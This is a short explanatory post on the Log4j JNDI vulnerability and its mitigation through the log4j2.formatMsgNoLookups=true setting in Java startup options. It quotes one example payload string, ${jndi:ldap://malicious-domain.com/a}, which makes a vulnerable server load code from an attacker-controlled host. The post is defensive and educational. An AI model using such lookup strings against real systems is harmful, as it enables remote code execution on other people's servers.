the attack surface for the log4j vulnerabity is quite large.
Checkout https://github.com/YfryTchsGD/Log4jAttackSurface
Log4j is an open source apache logging framework, which is used in many applications. By default when log4j logs request data the contained URLs are processed by the logging framework via “Java Naming Directory Interface (JNDI)”. That means a hacker can easily send a malicious request, which results in ${jndi:ldap://malicious-domain.com/a} in the logs. The malicious-domain.com is controlled by the hacker. The Log4j vulnerability is triggered by automatically making a request to malicious-domain.com via JNDI. The response from the hacker’s controlled domain contains a remote Java class file which is injected into the logging framework’s server process, which can execute arbitrary code.
How to fix
The most easy fix is to turn off the default behaviour log4j processing URL lookups in log messages.
Luckily there is a configuration option in log4j to exactly accomplish this.
-Dlog4j2.formatMsgNoLookups=true
In lots of java based web apps java options are controlled by environment variables. That means you can easily add the above configuration option in the startup script of your java apps.
For example:
EXTRA_JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"
or:
export JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"
or on Windows based apps
set EXTRA_JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true